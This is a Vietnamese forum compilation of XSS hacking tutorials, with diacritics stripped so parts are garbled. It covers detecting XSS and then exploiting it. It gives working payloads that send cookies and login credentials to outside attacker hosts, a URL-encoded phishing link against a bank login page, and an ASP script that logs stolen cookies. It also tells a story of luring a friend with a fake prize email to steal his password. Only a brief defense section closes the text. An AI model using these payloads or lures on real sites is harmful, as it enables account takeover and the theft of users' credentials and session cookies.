y l nhng bi vit v XSS m ti su tm c, hy vng gip cc bn hiu hn 1 cht
v vn ny Trc ht l bi vit ca Mask_NBTA
XSS c bn
Li xy ra nh th no ?
Li ny xy ra khi ng dng web thu nhn cc d liu nguy him c nhp t hacker . Nh bn bit th 1 website thng cha cc link , thng qua cc link ny hacker c th chn cc on code vo v khi ngi dng no s dng link ny th coi nh 99% l toi mng , ni nm na l hacker c th thng qua li ny chn code vo site hay link chm cc thng tin quan trng t nn nhn, cc thng tin quan trng y c th l cookie hoc username + pass vo ti khon 1 ngn hng no sau thng tin ny c gi ti cho hacker . Cch thng dng ca hacker l m ho cc phn nguy him ca link ( chn code) thnh kiu HEX ( hoc c th l cc hnh thc khc ) lm cho nn nhn t nghi ng khi click vo ci link nguy him . Sau l tm cch no cho nn nhn chu click vo ci link t by , ci ny ty thuc vo s gian xo ca tng hacker :-) , cng gian xo th cng mau ######ng thu c kt qu .
Hu ht cc ng dng web hin nay dng cookie kt hp 1 ti khon duy nht cho 1 ngi dng no , ngha l cookie ca ngi no ngi xi . Cc webmail , web bn hng , nh bng , ... a s u dng cookie vi mc ch chng thc ngi dng , v y cng l ci m hacker cn .
Vy ch chn code l chn ci qui g , dng ci g chn : dng Javascript ( thng dng ) , VBscript , ActiveX, HTML,hoc Flash
Chc cc bn hiu s s v ci li ny ri :-) . Khng hiu th xem tip s hiu .
Bi gi chng ta s ni tht r v ci li ny :
Trc ht gii thiu s vi cc bn v cch m ho 1 s cc k t thng dng trong li XSS ca thanh ADDRESS cht na khi b chong :
-------------------
V IBF Forum khng h tr table trong bi vit nn cc bn c th xem chi tit y bi vit ti y : http://members.lycos.co.uk/masknbta/mask.rtf
-------------------- s s vy thi , mun bit ht th cc bn t kim .
KIM TRA LI XSS
By gi ti s nu ra cc bc cc bn c th kim tra xem site c b XSS hay khng :
1 site bt k bao gi cng c 1 hoc tt c cc phn sau : search results, error messages , Web-form , ch yu li XSS nm cc phn ny , ni chung l XSS c th xy ra ch no m ngi dng c th nhp d liu vo v sau s nhn c 1 ci g .
Cch tm li cho r rng th cc chuyn gia bo mt chia lm 7 bc nhng theo ti nn chia thnh 5 bc :
Bc 1 : M website cn kim tra ( ci ny tt nhin ri )
Bc 2 : Bt u kim tra , nh v 1 tm kim hoc 1 login form v gi thng tin i (nhp thng tin v nhn submit hay login hay ok g ) , v d nhp ch "Mask_NBTA" chng hn hay ch g cng c .
Bc 3 : Xc nh kh nng site c b li XSS hay khng bng cch xem thng tin tr v :
V d bn thy nh th ny :
"Your search for 'Mask_NBTA' did not find any items"
"Your search for 'Mask_NBTA' returned the following results"
"User 'Mask_NBTA' is not valid"
"Invalid login 'Mask_NBTA'"
hoc l ci qui g m c dnh ti ch "Mask_NBTA" m bn nhp vo ban u th 99% "Alert" ny bi XSS
cn vi hnh thc th na ti cng xin trnh by lun :
+ Ch cc input hay cc bin ngay trn thanh address ( var= ) thy my ci ny th c nht d liu vo . Hy th vi nhng script ny :
< script>alert('Mask_NBTA')< /script>
hoc <i*g csstest=javascript:alert('Mask_NBTA')>
hoc &{alert('Mask_NBTA')};
Bc 4 : Chn code thc s vo ni b li :
chn ci ny < script>alert('Mask_NBTA')< /script> vo ban ny v nhn SUBMIT . Nu sau bn nhn c 1 popup c ch "Mask_NBTA" th "Alert" ny 100% b dnh XSS . Nhng xin ch , thnh thong vn c trng hp website b dnh XSS nhng vn khng xut hin ci popup th buc lng bn phi VIEW SOURCES (m bng) n ra xem . Khi view sources nh kim dng ny< script>alert('Mask_NBTA')< /script> , nu c th ht chy , XSS y ri .
Mt v d khc thng gp hn :
Gi http://sitebiloi.com/ l site b dnh li XSS v ta tm c ni b li nh th ny : http://sitebiloi.com/index.php?page=<s...< script> , ngha l ta c th chn code ngay trn thanh ADDRESS .
Ti khng th trnh by ht mi tnh hung c , ci m cc bn cn l hiu ra vn th bn s hiu c khi no b li .
KHAI THC
Kim tra li xong by gi phi tm cch khai thc li t c nhng g ta mong mun :
Ti s trnh by cch thng qua li XSS ly cookie ca nn nhn :
Vi on code ny th trnh duyt s thi hnh on code v sau s gi ton b cookie ti cho bn dng file .txt v bn ch vic m file ny ra xem .
Nhng khng phi lc no bn cng c th d dng chn code , lm lc cng phi linh hot 1 cht bi v ngi lp trnh website cng u th no d dng cho chng ta lng hnh nh vy , h cng c chiu ngn cn chng ta , cch h dng l "Lc code" (Anti-XSS Filter) . C ch ca h nh sau : b lc ny s loi b cc k t c bit m ngi dng nhp vo , n gin vy thi .
Chng l hacker chu b tay , cha chc ! Hacker cng c gng vt qua "b lc" bng mt vi th thut nh :
1/ Nu "B lc" loi b 2 k t "<" v ">" :
Hacker s dng "\x3c" v "\x3e" thay th v bt u chn code vi ') +
Chui "%26%7balert%28%27Mask%27%29%7d%3b" chnh l {alert('Mask')}; c m ho
Ti nu thm ra vi v d na cc bn d hnh dung :
*Forum YABB GOLD 1 SP1 (cha fix) , b XSS nh sau :
ht*p://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=10360245269< script>location%3d'Ht*p://www.hostbanupfile.com/cookie.php?Cookie%3d'%2b(docum ent.cookie)%3b< /script> , my ci k t long ngong bi gi s dng ri (t tra nh )
ta thc hin c l do li dng th img chn code . Khi "Alert" admin c ci topic ny th cookie ca n lp tc bay vo tay ta . H h !
Cch dng cookie va chm c :
i vi WIN XP th cookie c lu tr ti : C:\Documents and Settings\tn ca bn\cookies\
cn cookie no , chnh xc ti u th vo m kim , khng th bit c th c .
Kim c ri th thay th ci cookie ca ta thnh ci va chm c , xong tr li forum vi cookie ny th ta l admin . Nhng hnh nh nu ta chm cookie m "Alert" admin n log out mt tiu th cookie ny coi nh v dng , ch p dng c khi "Alert" admin ko log out ( khng bit ti nh c chnh xc hay khng nhng i loi c l ng )
Cn rt nhiu rt nhiu site + forum b li trn net , y ch l vi ba v d cc bn d hnh dung .
Cch d d victim vo ng ci link m ta mong mun :
mang tnh thc t v d hiu ti s k cho cc bn nghe 1 cu chuyn v hack bng li XSS v y cng l 1 tnh hung na ca li XSS :
Mt hm bun i ti lang thang trn net v vo 1 website n , v d l http://www.a.com/ theo thi quen ti nh 1 d liu bt k vo put in USERNAME , v y ci m ti ng vo l Mask_NBTA ti lin thy xut hin dng ch "Invalid login : user Mask_NBTA is not found in our data" , h h 1 triu chng ca XSS y ri , nhn vo thanh URL li thy ci ny http://www.a.com/login.asp?erro=Invalid%20...in%20our%20data
qu sng ri cn g , cng vic bi gi lm sao hack y . u tin ti save as ci trang ny vo da cng , dng NOTE PAD open v xem ci sources .Ti sao ti lm vy ? V ti mun bit 2 ci tn bin ca login form , v ti d dng tm thy , n l "ten" v "matkhau" , da vo 2 ci ny th ti bit mnh cn phi lm g , v phi chn code nh th no h h . Ci ti mun lc ny l lm sao da vo XSS ly c thng tin v username + pass ca nn nhn . Vy th mnh chn ci g y , sau 1 thong suy ngh ti quyt nh chn ci ny y :
Ti sao li chn thm 1 ng bin c tht vo, nh l lm sao nhn vo URL ta ko thy ci phn code chn thm ngoi sau , ch yu l lm cho ci link thm di long ngong trc ht lm hoa mt nn nhn , sau l to dng v c tht 1 cch t nhin cho ci link .
Lm ti y ti cht ngh ra mnh c "Alert" bn l member ca ci site ny , sn ang rnh ri chc n chi . Cch ti lm l send cho n 1 ci mail vi ni dung th ny :
My nghe tin g mi cha ! WEBSITE a.com m 1 cuc thi c tin thng l 1000 000 , li ng s trng ca my na , cn hng bit tham gia na . Xem ci link ny my s hiu :
H*tp://www.a.com/login.asp nhng bn di ci link ny s l ci http://www.a.com/login.asp?tnbin1=gi..au.value;%22%2E
Bn on xem chuyn g xy ra . Tt nhin l n s click vo ci link tng chng nh v hi , sau login vo site bnh thng m u ng l ci username + pass b ...........
Cng vic ca ti ch l vo host , m ci file log ra v xem , c g trong , b mt ..........
Cu chuyn ti y l ht . Chc cc bn cng hiu cch lm ca ti , hy vng vi nhng ci u thin ti ca cc bn th s c nhng cch hay hn cch ti va trnh by .
CCH PHNG CHNG XSS :
1/Trc ht l cho admin ca cc website :
+ Khng cho php bt c HTML tag no nhp vo t ngi dng .
+ Lc tt c cc Active Script t HTML Code
2/Dnh cho ngi dng :
Cn thn l trn ht , ng cht v thiu hiu bit .
Ti vit bi trc ht l n li kin thc cho chnh mnh sau l mun gii thch cho cc bn hiu tht r v nguy hi ca XSS m phng trnh .
Cross-Site Scripting (ko nh tc gi)
Gii thiu :
Bn bao nhiu ln nhn mt email m cha cc hyperlink ri ?Th ngh xem khi bn nhn c 1 mail link ti site m bn tham gia vi li mi cho kh ngt , ban click vo link m ko cht thc mc , login vi user ca mnh .... nh vy rt c th l bn mt pass vo tay mt hacker ri y ch l 1 vd nh v cross-site scripting thi .
Cross-Site Scripting
Cross-Site Scripting cn gi l XSS , li xy ra khi cc ng dng web thu nhn cc d liu nguy him ca cc hacker nh mt on m javascript ,Vbscript.... N s ch gip bn ly c thng tin mt ca mt ng dng web thi , ko hn ko km ( v bn hy qun ngay vic ngh rng khai thc thnh cng li ny ch mt vi pht nh )
XSS c kh nng nh hng ti cc site cho php ngi dng nhp d liu vo ,thng l :
Cc cng c tm kim Forms c in bi user Web message boards, guestbook Mt hacker khi pht hin ra li XSS s c gng dng n ly cookies, to cc trang login gi ly pass ca ngi khc ..v..v..
By gi chng ta bt u i su vo li XSS , trc tin l xc nh site dnh li ny :
V d mt cng c tm kim ca site sau khi c ta nhp gi tr ( v d : XSS ) n s tr v nhng g m ta va nhp ( tc in ra XSS ) th rt c kh nng n b dnh XSS . By gi ta view source ca site y nu tm thy " XSS " th ch th site ny dnh li ri , h h
m phng mt cuc tn cng bng XSS , mt site ngn hng online c creat ( www.freebank.com ). Trc tin hacker s bt u tm mt trang trn site ny c th nhp gi tr , trong v d hacker tm ra rng khi c gng login ko c th username s hin ln trn thanh URL nh sau : http://www.freebank.com/banklogin.asp?err=Invalid%20Login:%20Badlogin (%20 l cc k t trng )
tip theo , hacker s kim tra xem c th tim m HTML v javascript vo trang wweb ny c ko . n gin ch cn thay "Invalid%20Login:%20Badlogin " URL trn bng <script>alert('XSS')</script> , nu sau ta nhn c 1 ca s pop-up vi thng bo XSS th ta hon ton c th khai thc site ny qua li XSS . Anh ta by gi phi to 1 URL c th ly c cc thng tin nhy cm . to c 1 URL m c kh nng qua mt c nhiu ngi th hacker phi m sourrce ca trang web ( m c th y l trang banklogin.asp ) a vo URL ph hp: y hacker s thm vo on code sau ( ty tng trng hp c th m ta c th thay bng code khc )
</form>
<form action="login.asp" method="post"
onsubmit="XSSimage= new Image; XSSimage.src='http://hacker.com/'+document.forms(1).login.value+':'+document.forms( 1).password.value;">
khi c " tim " vo trang login th n s nh sau : ( on code ca chng ta c in nghing )
<table>
<tr>
<td bgcolor="#2E7AA3" Style="border:1px solid black " WIDTH ="258" HEIGHT="217>
<form action="login.asp" method="post>
<center>
</form>
<form action="login.asp" method="post"
onsubmit="XSSimage= new Image; XSSimage.src='http://hacker.com/'+document.forms(1).login.value+':'+document.forms( 1).password.value;">
<br> Username :<br><input type ="text" name ="login" style="border: 1px solid black; spacing :0"><br>Password:<br>
............................
Nh ta thy , on code c "tim " vo gm 2 phn chnh , mt l </form> kt thc <form> ca bn gc , hai l
<form action="login.asp" method="post"
onsubmit="XSSimage= new Image; XSSimage.src='http://hacker.com/'+document.forms(1).login.value+':'+document.forms( 1).password.value;">
Ch rng <form action="login.asp" method="post" ko h khc bn gc tuy nhin ta thm vo onsubmit , n c tc dng l chy on javascript khi victim click vo submit. Thng tin ca victim s gi n link trn (www.hacker.com )
Sau khi c c code ri , by gi hacker s phi a n vo URL : http://www.freebank.com/banklogin.asp?serviceName=FreebanlCaastAccess&templateN ame=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank. com&err=%3C%2Fform%3E%0D%0A%3Cform+action%3D%22login.asp%22+method %3D%22post%22%0D%0Aonsubmit%3D%22XSSimage%3D+new+Image%3B+XSSi mage.src%3D%27http%3A%2F%2Fhacker.com%2F%27%2Bdocument.forms%281%29 .login.value%2B%27%3A%27%2Bdocument.forms%281%29.password.value%3B%22 %3E%0D%0A
D nhn ra l URL ny khc vi URL m ta dng test XSS , n gin ch v nh th ny URL s di gim s nghi ng ca victim thi.
Ri , by gi ta s gi link ny n cho victim , c rt nhu cch qua mt h sau ch vic ch v check log file ti
www. hacker.com
Trn y ch l 1 v d nho nh thi bng sng to ca mi ngi s c 1 cch khai thc ring cho mnh Cc bn ko ch c th ly user v pass ca ngi khc m cn c th thay i gi tr ca sn phm ti 1 site mua bn , thm d liu ..v..v..v ..
Hi vong bi vit ny c th gip cc bn newbie nh mnh phn no hiu thm v XSS . vi cc bn cha bit XSS l g sau khi c xong bi ny th cc bn c li bi ca anh Mask_NBTA_83 .Bi y s gip ch nhiu y .
Khi no kim thm bi v XSS mnh s c vt 1 bi na nu ko ai thy phin h h
bi trn mnh ni qua v li XSS v cch khai thc ca n hn cc bn cn nh on javascript m hacker s s dng ly coookie ca victim ch (c ko t nhng mnh xin ch ra v d sau ) <script>document.location.repleace('http://hacker/payload?c=' + document.cookie ) </script>
<% Set bien = CreateObject("Scripting.FileSystemObject") Set taobien = bien.OpenTextFile(Server.MapPath("xss.txt"), 8, true) taobien.WriteLine Request.QueryString("cookie") taobien.Close Set taobien = Nothing Set bien = Nothing %>